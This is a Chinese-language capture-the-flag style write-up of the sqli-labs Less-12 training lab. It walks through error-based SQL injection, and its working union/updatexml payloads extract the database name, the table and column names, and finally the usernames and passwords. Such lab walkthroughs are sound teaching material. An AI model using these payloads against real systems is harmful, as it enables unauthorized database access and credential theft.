[网络安全]sqli-labs Less-12 解题详析

原理及姿势参考：[网络安全]SQL注入原理及常见攻击方法简析

判断注入类型

经测试可知，注入类型为")注入

---

判断注入点

判断注入点个数

由上下两张图回显可知，注入点个数为2

---

查库名

uname=1") union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#

可知库名为security

---

查表名

uname=1") union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#

回显四个表名

---

查users表的列名

uname=1") union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#

得到id、username、password列

---

查字段

uname=1") union select 1,updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)#

---

总结

以上为[网络安全]sqli-labs Less-12 解题详析，后续将分享[网络安全]sqli-labs Less-13 解题详析
原理及姿势可参考：[网络安全]SQL注入原理及常见攻击方法简析
我是秋说，我们下次见。